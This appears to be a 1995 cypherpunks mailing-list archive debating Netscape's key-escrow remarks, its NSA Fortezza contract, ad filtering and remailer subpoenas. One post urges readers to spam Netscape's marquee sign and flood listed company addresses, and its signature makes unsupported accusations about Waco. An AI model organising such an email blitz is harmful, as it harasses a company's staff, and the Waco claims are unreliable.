documentation of anything from what I would consider to be a reliable source. If you want to generate publicity about something, you better make damn sure your facts are correct, or you'll end up looking like an idiot. Complaining that Clark didn't deny it isn't good enough. -- Will From lindat at iquest.net Fri Dec 1 19:03:18 1995 From: lindat at iquest.net (Linda Thompson, American Justice Federation) Date: Sat, 2 Dec 1995 11:03:18 +0800 Subject: C'MON N' GIVE 'EM HELL, NET-NERDS!!!! Message-ID: They asked for it: "To secure Net communications, the government will need to have access to private data exchanges using what is known as a key escrow security system," -Netscape Communications chairman Jim Clark, arguing for a security system called key escrow that would require you to give the government access to your private messages. Source: STAMPER'S NEWS NUGGETS (1) SPAM THE SIGN Netscape has a webpage at www.netscape.com. There is a "toys" area and any message you leave in that area goes to an ELECTRONIC MARQUEE SIGN at Netscape that all the employees can see. SPAM THAT SIGN. (2) SPAM NETSCAPE Here's where the EMAIL BLITZ should go (extra points for creativity): info at netscape.com General information admgr at netscape.com Netscape site advertising sales x_cbug at netscape.com Bug reports from X Window users win_cbug at netscape.com Bug reports from Windows users mac_cbug at netscape.com Bug reports from Macintosh users hr at netscape.com Netscape Human Resources department training at netscape.com Netscape Training programs information admgr at netscape.com Netscape site advertising sales and Sponsor program information proprietor at netscape.com Netscape electronic store feedback editor at netscape.com Feedback about Netscape's Net site ssl-talk-request at netscape.com E-mail list for Secure Sockets Layer protocol discussion standards at netscape.com Questions about Netscape's open-standards activities nswinapi-talk-request at netscape.com E-mail list for users of the Windows Netscape Server API CORPORATE HEADQUARTERS ------------------------------------------------------------- NETSCAPE COMMUNICATIONS CORPORATION 501 E. Middlefield Rd. Mountain View, CA 94043 415/528-2555 Product and sales information (7:00 a.m. to 5:00 p.m. PST) 415/254-1900 Executive offices 415/528-4124 Fax http://www.netscape.com ATLANTA Netscape Communications Corporation 1850 Parkway Pl. Suite 420 Marietta, GA 30067 CHICAGO Netscape Communications Corporation 2159 N. Seminary Chicago, IL 60614 DALLAS Netscape Communications Corporation 17304 North Preston Road Suite 800 Dallas, Texas 75252 NEW YORK Netscape Communications Corporation 599 Lexington Ave. Suite 2300 New York, NY 10022 NORTHWEST Netscape Communications Corporation 501 Middlefield Rd. Mountain View, CA 94043 SOUTHWEST Netscape Communications Corporation 111 N. Sepulveda Blvd. Manhattan Beach, CA 90266 WASHINGTON, D.C. Netscape Communications Corporation 6701 Democracy Blvd. Suite 300 Bethesda, MD 20817 THANKS AND A HAT TIP TO HELEN AT E.PLURIBUS FOR GETTING ALL THE ADDRESSES!!!!!!!! Kind regards, *********************** V ************************* DEATH TO THE NEW WORLD ORDER **************************************************** Linda Thompson American Justice Federation Home of AEN News & news videos, "Waco, the Big Lie," "America Under Siege" 3850 S. Emerson Ave. Indianapolis, IN 46203 Telephone: (317) 780-5200 Fax: (317) 780-5209 Internet: lindat at iquest.net ************************************************** Remember Waco. The Murderers are still free. *************************************************** The Army is going to courtmartial Spc. Michael New for not wearing a U.N. uniform, but the Army won't courtmartial the members of the 160th and 158th Special Operations, 82nd Airborne, Ft. Hood Cav Members, and 10thMountain Division members who helped MURDER CHILDREN at Waco. What's wrong with this picture? From jsimmons at goblin.punk.net Fri Dec 1 19:08:23 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Sat, 2 Dec 1995 11:08:23 +0800 Subject: Filtering Net Commercials Message-ID: <199512020237.SAA03409@goblin.punk.net> On December 1, Timothy C. May wrote: > One patch I'd pay money to have is one which intercept the "commercials" > Netscape blasts out at us and replace them with something else (maybe > nothing, maybe a "quote for the day," maybe something from a > user-selectable file of items). > > I understand that Netscape is collecting money for these "commercials," and > that they control what is sent out. So, any such patch to intercept/remove > these commercials would have to be done locally. Can this be done? This is from a post to cypherpunks back in September. Given the current situation, maybe a re-posting is in order. (If not, flames to my address please, the list has enough to worry about.) I just checked, it's still at the ucsb.edu site. - - - Begin forwarded message - - - On the subject of HTTP proxies, [SEVERAL FWD'S DELETED, ENTERTAINING SUBJECTS RETAINED] Subject: The agents/advertising arms race heats up Subject: OH YEAH BABY, FILTER ME HARDER >From: Axel Boldt >Newsgroups: comp.infosystems.www.announce >Subject: SOFTWARE: Filtering ads out of popular web sites >Organization: Univ of California at Santa Barbara, Dept of Mathematics >Approved: www-announce at boutell.com >Message-ID: <44ercn$nhl at holly.aa.net> Several popular web sites have recently turned to putting advertising gifs on their pages. NoShit is a tool that filters these out so that you don't see them - in fact, you don't even download them in the first place, thus saving time, money and brain capacity. NoShit is implemented as a set of patches against Cern httpd to turn it into a "filtering proxy server". This means that the proxy maintains a list of URL templates together with corresponding filter scripts. When a document is requested form the proxy that matches one of the templates, then the page is piped through the corresponding script before being presented to the client. This works together with caching, if desired. The idea is to run your own personalized NoShit proxy server and point your browser to it. The proxy does the filtering; the browser doesn't even know about it. This scheme works with every browser. I have written a ready-to-use library of filter scripts for a couple of well known, ad-infected sites, including Yahoo, Lycos, Netscape, HotWired, CNN, Infoseek and NandO Times. You can change these or add your own very easily. Locations: (Germany) (California) Enjoy, Axel - - - End forwarded message - - - -- Jeff Simmons jsimmons at goblin.punk.net From vznuri at netcom.com Fri Dec 1 19:33:23 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Sat, 2 Dec 1995 11:33:23 +0800 Subject: key escrow compromise Message-ID: <199511302339.PAA01778@netcom5.netcom.com> to most on the list, the subject of this message would be an oxymoron. ("there is no compromise!") regarding the recent Netscape brouhaha: I tend to agree with Clark in only one regard: the government is going to get into the key storage/retrieval business in some form or another eventually & inevitably; it's just not stoppable. like one of the NSA spooks said after the Clipper fiasco, "well, we had to try". the aspect that is up for grabs is whether these systems will be *mandatory* for all private communication. here's a quick idea. the post office is getting into certification authorization come hell or high water (ETA summer, 96). now, frankly I think this is a good thing. someday we will need some kind of legal agency to deal with citizen keys, so that we could have cryptographic dealings with federal agencies such as the motor vehicles department, etc. many are going to blast me to oblivion for saying this, though. but don't you think there are some benign government services that you would like to have access to via your "state" or "legal identity" key? this would prevent other people from faking your identity in front of the state, e.g. voter fraud, and other miscellaneous things. it seems to me the problem is when a government begins to insist that the only authorized encryption you can use must be based on the secret key they give you is where all the problems arise. so, what we could advocate as a compromise (given that the post office is absolutely not going to *not* get in this business, from what I can tell). we encourage the idea of KEY FREEDOM this would be a heading for the idea that we are in support of the (our) government creating cryptographic infrastructures and key authentication services, as long as we always have the total freedom to encrypt according to however we please in private communications. in other words, we are willing to have an official state identity/key as long as it is not required in our private transactions, only those involving the state. (yes of course I know "state" is a pornographic word here, heh). if you don't like this imagine it as a "stopgap measure" on the way toward full cryptoanarchic infocalypse that government bureacrats might buy. another idea is that we might reasonably support a system that has such a thing as "key escrow" but we only use the keys they give us as part of our signatures to other people if we want to reveal our "official" state identity, not to encode the communication itself. in this way someone else could verify your identity for e.g. legal/ contractual purposes, but the overall communication would remain private. in other words, we agree that the government does have the authority to link people to their "official numbers", but we have a choice about when to use those official numbers in any private communication, and by law businesses do not ever have to *require* authentication in this way. the numbers of course would be required in communication between the individual and government. the situation is that the government *now* requires that it knows who we are when we communicate with it in any official context. therefore I submit that the above system would not take away any rights, and in fact might lead to privacy advocates being able to use a massive government key-infrastructure but still retain communication privacy. in other words, you now have the government actually supporting your cryptographic freedom by giving you a massive "official" key distribution system you can use any way you like. another possible compromise is that by default, keys would be insecure, in the sense the government stores them for "key escrow" purposes, but people are always recognized as having the right as "tunneled encryption" (a great term for private encryption within the state encryption). you see, cypherpunks often recognize that most of the world is so clueless that they don't protect themselves, and they almost don't deserve to have privacy by the default if they are entirely clueless or apathetic about obtaining. so what we might be able to accomplish is a system in which all the clueless people use the government-supplied keys, the FBI cracks some percentage of "clueless" criminal communication, and non-clueless people go ahead and bypass it all. now, before you hotly flame my eyebrows off, I say these things not because I like key escrow, but that I suspect the post office is going to move into certification no matter what, and the idea of key escrow is closely related to that. with a little finetuning the cypherpunk position could help define the actual rights of individuals relative to these new government systems in a way that is totally compatible with all our core privacy beliefs. what I am getting at is that we could twist the words "key escrow" to mean that the government provides some infrastructure for storing & accessing public keys (similar to phone books), and we could simultaneously vehemently deny that "key escrow" legitimately allows the government to actually *have* our secret keys. in other words, we say, "yes we support key escrow. of course it is a good idea to let the government have simple phonebooks of keys. oh, wait, you mean we have to USE THESE KEYS? in the official STATE ENCRYPTION ALGORITHM? we have to STAMP OUR SSN# ON EVERY TRANSACTION WITH EVERY BUSINESS? sorry buster, what I do with my key is my private matter. this would be again to having official government phones that allowed the government to call any number and start surveilling the room the phone is in." From master at internexus.net Fri Dec 1 20:43:36 1995 From: master at internexus.net (Laszlo Vecsey) Date: Sat, 2 Dec 1995 12:43:36 +0800 Subject: Netscape, Mosaic, and other goodies. Message-ID: > > > The field is User-Agent. However, blocking access to users of Navigator > > > isn't a particularly useful thing to do. If you must do something, why > > > not modify your GET handler to add a header to the start of all html > > > pages informing people of the problem, and suggesting alternatives. > > > > Great idea! I'm sure there is a cypherpunk on this list willing to write a > > patch to NCSA HTTPd to get the job done, in a configurable manor of > > course so that a template.html would be 'inserted' at the top of every > > document sent out to the specified browser. Any takers? > > No need. Simply add > > > > to the start of your page. Netscape browsers will be redirected. Are you sure Netscape browsers are the only ones that currently implement this tag? Other browsers will be implementing it soon enough I'm sure. I think the only fool-proof way of doing it is at the webserver. Anyway, isn't 5 million bux a little too much for the government to give Netscape for the security improvements? I would think that for less than a million a group of programmers could be rounded up to create a stable multi-platform web navigator with VRML, MPEG, Audio, Postscript, and a zillion other features built in. :) It's funny how one day we are raving about how great Netscape is, and the next day we hate them. If we aren't pleased with a particular piece of software, instead of argueing about it we should just go and make one that we are pleased with. Using the many libraries available such as MPEG, GIF, JPEG for example and releasing it under the GNU agreement is the way to go. Or perhaps we should just back the original browser, NCSA Mosaic. With some improvements it could once again be the best browser on the net. I suppose I'm not clear about the implications of these eskrow keys... just because the government is supporting it, and Netscape will be implementing it doesn't mean that we have to use it. Is it against the law to encrypt data (using your own method) and send it over the Internet? I don't think so. ... From jcobb at ahcbsd1.ovnet.com Fri Dec 1 21:47:10 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Sat, 2 Dec 1995 13:47:10 +0800 Subject: No Privacy Right in UK ? - Part 3 Message-ID: Friend, A 12 01 95 The Electronic Telegraph newsstory headlined Policeman bugs own station by mistake reports: ...a listening device was found at the headquarters of Lothian and Borders Police in Edinburgh. The "bug", disguised to look like a plug adaptor, picked up the day-to-day business of the operations room, including radio and telephone messages and conservations between staff. Conservations between staff? Conversations in which not a word is wasted? Its presence was discovered when staff in a rest area tried to tune a radio to a different station and picked up the voices of their colleagues. I used to despise those who couldn't keep their hands off the dial for 5 minutes, but since reading this story my attitude's been adjusted. Concerned that secrets were being transmitted abroad, the force "swept" the control room with anti-bugging technology, only to find that the device belonged to them. It had been "planted" by an officer who thought it was a real adaptor. Of course I believe that! For what comes around...goes around. Cordially, Jim NOTE. The Electronic Telegraph website's URL: http://www.telegraph.co.uk The newsstory's by: AUSLAN CRAMB, SCOTTISH CORRESPONDENT Its online filename: 1bugs01.html From EALLENSMITH at ocelot.Rutgers.EDU Fri Dec 1 21:55:31 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Sat, 2 Dec 1995 13:55:31 +0800 Subject: DigiCash releases protocol specs! Message-ID: <01HYB9JVY8VG8WZ1OE@mbcl.rutgers.edu> From: IN%"support at marktwain.com" 1-DEC-1995 18:56:11.57 By popular request, DigiCash is releasing the protocol specs. The specs are available at http://www.digicash.com/ecash/protocol.html Please be aware that the doccument is work in progess. More specifications, including byte level descriptions of the message format will be added throughout the weekend. --Lucky Green at ---------------------- Thank you. This raises my likelhood of using DigiCash's electronic currency from about none to above that. -Allen From gimonca at mirage.skypoint.com Fri Dec 1 22:55:14 1995 From: gimonca at mirage.skypoint.com (Charles Gimon) Date: Sat, 2 Dec 1995 14:55:14 +0800 Subject: [NOISE] Fun quote Message-ID: Just heard on tonight's "X-Files"... "The NSA?? Since when did they start issuing you guys piano wire instead of guns??" I can hear the clatter of .sig files being updated all over the net. From Kevin.L.Prigge-2 at cis.umn.edu Fri Dec 1 22:55:17 1995 From: Kevin.L.Prigge-2 at cis.umn.edu (Kevin L Prigge) Date: Sat, 2 Dec 1995 14:55:17 +0800 Subject: A challenge ... In-Reply-To: <199512010735.XAA04851@netcom14.netcom.com> Message-ID: <30bf2dac4d6f002@noc.cis.umn.edu> According to rumor, Jordan Hayes said: > > I've been challenged to try to find a bank account; I win the challenge > if I can wire in $100 to the hidden account. Anyone have any good > ideas about how to find an ABA number? Depends on what information you have. You looking for a Bank Name/ABA # lookup, or the other way around? -- Kevin L. Prigge |"A computer lets you make more mistakes faster UofM Central Computing | than any invention in human history--with the email: klp at umn.edu | possible exceptions of handguns and tequila." 01001001110101100110001| - Mitch Ratcliffe From rah at shipwright.com Fri Dec 1 22:55:33 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 2 Dec 1995 14:55:33 +0800 Subject: A "Warning Banner" for Netscape Navigator? Good idea! Message-ID: It's been a long and interesting day... >Pull down the 'Options' menu, grab the 'Window and Link styles' >page, and change the default "home page location" from >netscape's to whatever you want. Oh. *Those* advertisements! I couldn't for the life of me figure out *what* Tim was talking about. I've made mine come up blank since the initial, "Hey, what do these twiddly bits in the Preferences command do...", session after the first download. You can also put up a type-it-yourself URL window on the browser window, which comes in handy now that you have to wait 10 seconds (on my dinky PB 180) every time you change code modules in 2.0b3 Netscape (like touching the menu bar for the first time, or looking at the bookmark window)... Like I've said elsewhere, Netscape is hierarchical code trying to conquer a geodesic (a word I got from Bucky Fuller, through Peter Huber, just so I keep my attributions straight...) network. It ain't gonna fly, in the long run, folks. In that vein, could someone e-mail me the best non-netscape Mac browser, so I don't get HTML-nasties when I go play on the cactus machine? Anyway... Dave Winer(sp?), the Mac-Developer-turned-gadfly (speak not ill of the other gadflies, I always say...), talks about seeing some Netscape (sorry...) patches which actually *do* strip banner ads from various web-pages. I believe you have to tell it which pages, and what the banners' file names are, but I'm not sure. Don't know where *Weiner(sp?)* got it from... I seem to remember the name "Ad Stripper" but I could be imagining things... Of course, if that's the way this code really operates, simply changing the name of the HREF call regularly on the server side, which is probably done anyway, with all the web-management code showing up out there, defeats ad-filters of this kind completely... Obcrypto: Maybe these web-pages will send you nanocash (not mine, either, sorry, taken from one of the wearable-people at mobileworld, I'll look up their name, and get back to you. soon. I promise.) to watch their message? Also, could someone talk here about how easy it might be to spoof Java "byte code"? The Java presentation at this conference had a lot of hand-waving and reverent invocation of Whit Diffie's name, so it might not be trivial. Another feature of this presentation was a really splendid "subjective axis" chart showing how "powerful" Java is in comparison to say, client-server, HTML, and other "technologies". This chart reminded me for all the world of the famous "Pravda Charts" that Tufte likes to lampoon in "The Graphical Representation of Quantitative Information". Just so I keep my sources straight. Of course. To quote Prof. Tufte. "If it looks like a duck, ignore it." Or something to that effect. Maybe the word "waddle" was in the sentence. Maybe he got it from someone else... I'll get back to you on that. I really will... ;-). Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From jhupp at novellnet.gensys.com Fri Dec 1 22:58:11 1995 From: jhupp at novellnet.gensys.com (Jeff Hupp) Date: Sat, 2 Dec 1995 14:58:11 +0800 Subject: "Got a subpoena?" Message-ID: <26C7BF95B31@Novellnet.Gensys.com> On 30 Nov 95 at 12:56, Jay Campbell wrote: : >> "finessing" laws will become more important. In short, they WILL have : >> a subpoena--then what? : > : > Then they'll find out that I don't have any information that : >could help them, anyway. : : What about a court order to (a) start comprehensive logging, and (b) not : tell anyone under penalty of ______ . And at that point, you shut down the remailer and log each and every bounce. Now, they could get an order forcing you to run a remailer ~ but that would open up a whole new can of worms i.e. can you be forced, under court order, to commit a crime? -- JHupp at gensys.com |For PGP Public Key: http://gensys.com |finger jhupp at gensys.com Autocracy is based on the assumption that one man is wiser than a million men. How's that again? I missed something. From jamesd at echeque.com Fri Dec 1 22:59:18 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 2 Dec 1995 14:59:18 +0800 Subject: Barring access to Netscape Message-ID: <199512010802.AAA09494@blob.best.net> At 12:32 AM 12/1/95 +0600, Ed Carp wrote: >If you want to bar access to your site from a Netscape browser, such >can easily be accomplished. If memory serves, every browser, when >connecting to a site, exchanges certain information about the client >with the server. One can gain access easily to that information. This would not be satisfactory in itself: Ideally one would like to bring up a page saying "Sorry, you cannot access that page because you are using a netscape browser: Click *here* for the sad tale of Netscape. > --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From zuhn at sctc.com Fri Dec 1 22:59:30 1995 From: zuhn at sctc.com (david d `zoo' zuhn) Date: Sat, 2 Dec 1995 14:59:30 +0800 Subject: nsa and netscape In-Reply-To: <951201073154.60201e3d@mitlns.mit.edu> Message-ID: <199512011553.JAA12735@spirit.sctc.com> // At yesterdays FNC (Federal Networking Council) meeting it was // mentioned in passing that NSA has given Netscape a grant of $5 Million // (yes $5M) to beef up the security features of Netscape. More info will // be forthcoming on this. This isn't all that surprising. The NSA likes Fortezza, and Netscape has announced that they will be supporting Fortezza based authentication. This was first made public in the SSL v3 draft circulated many months ago. FORTEZZA support is virtually required for any sort of new network authentication within the US DoD. The DoD pie is rather large, and I don't blame Netscape for trying to get a piece of it. One can support FORTEZZA without giving in to GAK for non-FORTEZZA users. -- david d `zoo' zuhn --- secure computing corporation zuhn at sctc.com From ravage at einstein.ssz.com Sat Dec 2 15:01:11 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Sat, 2 Dec 95 15:01:11 PST Subject: update.250 (fwd) Message-ID: <199512022305.RAA05770@einstein.ssz.com> Forwarded message: From nobody at REPLAY.COM Sat Dec 2 15:23:33 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 2 Dec 95 15:23:33 PST Subject: unwanted AIP mail? Message-ID: <199512022323.AAA00288@utopia.hacktic.nl> Anyone else suddenly start hearing from these folks? > Date: Fri, 1 Dec 95 14:44:34 EST > From: physnews at aip.org (AIP listserver) > Message-Id: <9512011944.AA12171 at aip.org> > To: physnews-mailing at aip.org > Subject: update.250 > X-UIDL: 817946091.001 > > PHYSICS NEWS UPDATE > The American Institute of Physics Bulletin of Physics News > Number 250 December 1, 1995 by Phillip F. Schewe and Ben > Stein > > TWO-BIT QUANTUM LOGIC GATES have been experimentally {...} From jsw at netscape.com Sat Dec 2 15:41:56 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sat, 2 Dec 95 15:41:56 PST Subject: Info on Netscape's key escrow position In-Reply-To: <9512021318.AA27932@all.net> Message-ID: <30C0E317.71DC@netscape.com> Dr. Frederick B. Cohen wrote: > > > I had lunch with Jim Clark today, and explained the furor that was > > currently going on in cypherpunks and elsewhere. After lunch he sent > > me the e-mail that I've attached below to pass along. I think the gist > > of it is that if governments require key escrow, we will have to do it > > in order to sell our products with encryption into those countries. > > The point Netscape seems to miss is that by refusing to go with weak > crypto and having the best product on the market, Netscape may be able > to force these governments into a position of accepting it. > > Suppose Netscape took the position that it was 512 bit RSA, and that it > was for sale to anyone who wanted to buy it? The result would either be > a billion dollars of market impact and a collapse of the high-tech stock > bubble we are now building, or the government backing down. This is exactly what the government wants. Some of the largest software companies have been producing software that only supports short key lengths for both export and domestic use for years, and it has not caused the government to back down. > If the US government backed down, and Netscape became the best product > around and maintained that lead for a long time, other countries would > either have to allow Netscape in, or suffer the consequences of falling > behind in the IT curve. Many customers in other countries want our US version. They are pushing on their governments and the US government to get it. This is already happening. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at netscape.com Fri Dec 1 23:53:30 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sat, 2 Dec 1995 15:53:30 +0800 Subject: nsa and netscape In-Reply-To: <951201073154.60201e3d@mitlns.mit.edu> Message-ID: <30C000A3.E0E@netscape.com> Bob Bruen, MIT Lab for Nuclear Science wrote: > > The following came from a government source. I thought it might be of > interest. > Bob > -------------------------------------------------------------------------- > > At yesterdays FNC (Federal Networking Council) meeting it was > mentioned in passing that NSA has given Netscape a grant of $5 Million > (yes $5M) to beef up the security features of Netscape. More info will > be forthcoming on this. This is not strictly true. The NSA has given us a contract to add support for Fortezza to some of our products, including servers and navigators. The amount was less than $5M, but I'm not sure that I should say how much it was. One of the things we hope to get out of this work is an architecture for our products that allows us to easily support other crypto hardware, including devices that don't use Secret algorithms, and don't require key-escrow. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From EALLENSMITH at mbcl.rutgers.edu Sat Dec 2 15:56:39 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Sat, 2 Dec 95 15:56:39 PST Subject: Info on Netscape's key escrow position Message-ID: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu> From: IN%"jsw at netscape.com" "Jeff Weinstein" 2-DEC-1995 02:26:13.63 I had lunch with Jim Clark today, and explained the furor that was currently going on in cypherpunks and elsewhere. After lunch he sent me the e-mail that I've attached below to pass along. I think the gist of it is that if governments require key escrow, we will have to do it in order to sell our products with encryption into those countries. > If we as a company were to take the position that in no case will we allow > a government to get access to our encrypted messages, or refuse to allow > key escrow with our products, the governments of the world will quickly put > us out of business by outlawing the sale of our products in their countries. > The fundamental issue is how do we accommodate the requirements of > governments, while protecting our rights as citizens. > > None of this represents the position of Netscape with respect to what we > will do. But if we do not come up with a solution to this problem that is > acceptable to each government, we will not be able to export our products, > except with a short key length (e.g. 40 bit keys), and that will not be > acceptable to corporate customers in other countries. They will create their > own solution, and we will not be able to sell to a larger world market. In > fact, we could even be ordered by our own government to establish a key > escrow system for its use inside the US. ---------------------- I believe that the central question at hand is whether Netscape will incorporate mandatory GAK into any of its products if you have an economic (governmental purchase) rather than physical (governmental threat of violence) reason to do so. I would hope that the upcoming statement will clarify this position, and in the proper direction. -Allen From cp at proust.suba.com Sat Dec 2 16:09:49 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Sat, 2 Dec 95 16:09:49 PST Subject: Info on Netscape's key escrow position In-Reply-To: <30C0E317.71DC@netscape.com> Message-ID: <199512030009.SAA00717@proust.suba.com> > Many customers in other countries want our US version. They are pushing > on their governments and the US government to get it. This is already > happening. Couldn't you set up a company in the Netherlands or some such place that allowed you to export to the rest of the world? There could be a US version of Netscape, produced here in the States, and a strong international version produced by a different company, using non crypto technology licensed from Netscape and a crypto engine produced entirely offshore. You could make the offshore firm virtually worthless by forcing them to give all the money to Netscape proper in the form of licensing fees. It wouldn't matter who owned it, so you could give the franchise to a Dutch national without giving away the store. I seem to remember US companies getting around restrictions on doing business with South Africa using a similar strategy. From jsw at netscape.com Sat Dec 2 16:11:23 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sat, 2 Dec 95 16:11:23 PST Subject: Info on Netscape's key escrow position In-Reply-To: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu> Message-ID: <30C0E933.851@netscape.com> E. ALLEN SMITH wrote: > I believe that the central question at hand is whether Netscape will > incorporate mandatory GAK into any of its products if you have an economic > (governmental purchase) rather than physical (governmental threat of violence) > reason to do so. I would hope that the upcoming statement will clarify this > position, and in the proper direction. > -Allen If the government wants to purchase software for its own use that implements key escrow, why it that bad? The whole point of our anti-GAK position is that government mandated key escrow is bad. If individuals, companies, or government agencies want to escrow their own keys, with the escrow agents of their own choosing, I have not problem. Its only when the government make the escrow and the agent mandatory that I've got a problem. I don't believe that Netscape will ship a product that mandates GAK unless it was required by law to do so. As long as it is legal to sell non-escrowed crypto products in this country or elsewhere, I think we will keep doing it, because that is what our customers want. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at netscape.com Sat Dec 2 16:13:06 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sat, 2 Dec 95 16:13:06 PST Subject: Info on Netscape's key escrow position In-Reply-To: <199512021603.IAA00950@blob.best.net> Message-ID: <30C0EA69.4806@netscape.com> James A. Donald wrote: > > At 11:01 PM 12/1/95 -0800, Jeff Weinstein wrote: > > > > I think the gist > > of it is that if governments require key escrow, we will have to do it > > in order to sell our products with encryption into those countries. > > Jim Clark wrote: > >> But if we do not come up with a solution to this problem that is > >> acceptable to each government, we will not be able to export our products, > >> except with a short key length (e.g. 40 bit keys), and that will not be > >> acceptable to corporate customers in other countries. > > I read it as saying: "Let us help the government invade the privacy > of our customers, so that the government will do us some favors in export > licensing", rather than "Well if they stick it to us at gunpoint, > we will submit." After talking with Jim over lunch, I believe that the second interpretation is more accurate, and is certainly true of the companies position at this point. Also keep in mind that Jim's comments are his own opinion, and do not necessarily represent the position of the company. Barksdale's law is that we provide value to our customers. Our customers want long keys an no GAK, both within and outside the country. As long as we are legally allowed to do that, I think we will. The fact that customers know the dangers of 40-bit keys, and that it is the government that is forcing them to use weak keys, is in large part due to the brute force cracks of the cypherpunks. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From unicorn at polaris.mindport.net Sat Dec 2 00:24:21 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sat, 2 Dec 1995 16:24:21 +0800 Subject: Netscape gives in to key escrow In-Reply-To: <951201140557.20a03b98@ROCK.CNB.UAM.ES> Message-ID: On Fri, 1 Dec 1995 JR at ns.cnb.uam.es wrote: > From: SMTP%"tcmay at got.net" 1-DEC-1995 12:26:55.99 > >First, a viable strategy is to simply do nothing. Ignore the goverment's > >protestations, drag one's feet, shrug, etc. Jim Clark could simply have > >said nothing. (Recall that Bill Gates came out recently saying that strong > >encryption is inevitable...Clark could have either said nothing, or said > >something similar to what Gates said.) > > That may be a very bad move from their point of view. If the Gov. > pushes hard, and it is an important customer, it is in their interest > to satisfy them. As long as anyone else wants to follow the Gov. it is > also good for them to follow those lines, and to be the firsts ones. > > What about foreign customers? If the Gov. can restrict export of > your technologies, they'll move to other providers. It is better for > you to pay hommage to the Gov. requests and get to overseas markets > faster and sooner than anyone else. You need to think real hard about how likely foreign customers on a scale as large as the U.S. government are going to be attracted to a product that forfeits its keys to the U.S. government. Consider this problem again in light of all the hand waving about the U.S. intelligence agencies and industrial espionage/intelligence. > > >Second, the issue is not "satisfying" a "bunch of cypherpunks." If Netscape > >truly pushes for GAK, and people reject GAK and Netscape, then this will > >surely hurt shareholder value. (Frankly, I expect one or more stories to > >appear in the next few days about the budding "Friends Don't Let Friends > >Use Netscape" and "Just Say No to Netscape" movements. Whether this will > >hurt the stock is unclear.) > > The "just say no" movement is OK as long as you don't append > "to XXX". It could work if it is only Netscape... But as soon as anyone > else gives in (e.g. Microsoft) it will become a burden. It's much better > IMHO to ask "say yes to privacy". It's much better to say "this page is > optimized for good safety and may not be reliable under non-crypto > browsers -e.g. Netscape-" than saying "your browser is bad". Which > BTW, may be OK in the USA, but is not in other places. Belgium comes > to mind for forbidding negative advertising. And surely others. And most of those laws apply only to other members of the market, not "public safety" announcements by private or not-for-profit organizations. It infuriates me to turn this into a question of hand wringing over exactly HOW to say that your keys will be turned over to the nearest government agency and that the product, from a security standpoint, is simply unacceptable. I suppose we could call it "security challenged" but I think that a bit silly, don't you? Then again, we wouldn't want to hurt anyone's feelings. If you can't say anything nice, then key forfeiture obviously sucks. > > >I say that the ideas being discussed are in fact "constructive" ideas. I > >won't reiterate them all here, but they clearly involve concrete action > >(e.g., modifying server software to issue warnings to Netscape users, or > >encouragement of alternatives to Netscape). > > Some of them are. Others are not. Others are destructive (like > denying access to Netscape users), or unpracticable (like saying "Mozilla > is not the best thing" in some places), or unrealistic (like saying "quit > your job"), or plain silly. Let's put this example in a more personal context, with you as the netscape guru. In fact, let us carry that assumption along, as really I'm talking to the netscape insiders to begin with. It's silly or unrealistic only because your views on the subject are obviously worth less than the salary cut you would take for quitting. In fact, the fact that it is silly or unreasonable at all for you to resign is totally based on your assessment of what the spread of strong crypto and the opposition to key forfeiture is worth. You have made that decision, but don't call hopeful prodding unrealistic unless you include the statement 'key forfeiture is simply not worth enough for me to endure the risk and likely salary cut I will have to face if I oppose it strongly.' > If you deny access to a user, you'll make him/her angry. And not > angry with Netscape. They'll be angry with you. We need people on our > side. That's basic psicology. I'd go for more pages explaining what > crypto is and can do for Joe Random. Your faith in Joe Random vastly exceeds mine. > Many people has said "I can do this or that with my server or > whatever". How many people is offering an alternate safe crypto service > and making it interesting and desirable for Joe Random? And making it > well known? I'd say that not enough. And one less now that Netscape has taken this position, yes. Shuffling the blame off on everyone else is a fine thing to do unless you are sitting on top of a hunk of cash, a lot of influence, and a foot into the market. You have the chance here to do a lot of good, rather than cave in and suckle off the teat of your local authority figure. Then again, your money is in your pocket, and we have well estlablished exactly what strong crypto is worth to you. > If you can offer an attractive service, protected with another > crypto method, and make it popular, people will demand it. If you just > add a note saying you use that crypto 'cos Government-enforced crypto is > not good enough, people will feel happy and will learn. Again, your faith in Joe Random is excessive. NETSCAPE has a position of power at the moment, and could easily energize the issue and educate a lot more stockholders by taking a stand than by caving in. If your concern is education, netscape press releases and political positions are much more potent in that regard than cypherpunks mailing lists. Your information cost is lower by a factor of 100 or more. Putting the burden on our shoulders, and then couching it in terms of the cypherpunks being negative, when indeed 